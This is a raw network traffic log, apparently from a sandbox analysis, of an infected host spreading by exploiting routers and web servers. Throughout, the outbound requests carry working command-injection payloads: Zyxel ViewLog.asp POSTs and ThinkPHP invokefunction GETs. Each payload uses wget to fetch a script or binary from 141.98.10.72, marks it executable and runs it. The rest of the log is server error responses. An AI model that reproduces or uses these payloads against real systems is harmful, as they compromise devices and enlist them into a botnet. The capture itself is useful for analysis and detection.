Feb 14, 2024 09:29:33.722090006 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:22.872811079 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.15	55684	94.123.65.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.648662090 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.15	36418	95.58.76.157	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.692128897 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:47.994874001 CET	29	IN	HTTP/1.1 200 OK
Feb 14, 2024 09:28:47.998732090 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.15	34790	95.111.218.63	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.699644089 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:48.008016109 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:28:47 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.15	35576	94.101.49.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.856411934 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.15	58922	94.122.18.192	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:47.898025990 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.15	35590	94.101.49.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:48.056087971 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:49.243297100 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.15	51906	112.169.120.242	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:49.299837112 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:49.576498032 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:28:49 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.15	52944	112.166.212.55	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:49.299901962 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.15	44776	85.93.234.151	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:49.528207064 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:28:49.757848978 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 14 Feb 2024 08:28:48 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.15	47280	95.73.170.175	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:55.841908932 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:56.081674099 CET	339	IN	HTTP/1.0 400 Bad Request Date: Wed, 14 Feb 2024 11:28:46 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.15	55932	95.100.203.69	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:56.038983107 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:56.235270023 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:28:56 GMT Date: Wed, 14 Feb 2024 08:28:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 63 62 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 36 26 23 34 36 3b 64 35 61 63 30 30 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.45cb645f.1707899336.d5ac001</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.15	55572	95.100.53.49	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:56.050827980 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:56.260006905 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:28:56 GMT Date: Wed, 14 Feb 2024 08:28:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 33 36 26 23 34 36 3b 37 66 34 38 66 62 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3ef90a17.1707899336.7f48fbb</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.15	40644	31.200.78.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:56.064256907 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.15	57886	95.79.128.165	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:56.086123943 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:56.341994047 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Tue, 24 Jul 2001 14:25:56 GMT Server: lighttpd/1.4.32 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.15	35078	95.221.199.108	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:56.286077023 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:28:56.532382011 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 14 Feb 2024 08:28:41 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.15	57198	95.35.40.90	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:56.307430029 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.15	40368	31.136.204.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:28:57.032988071 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:00.186964989 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:06.330887079 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
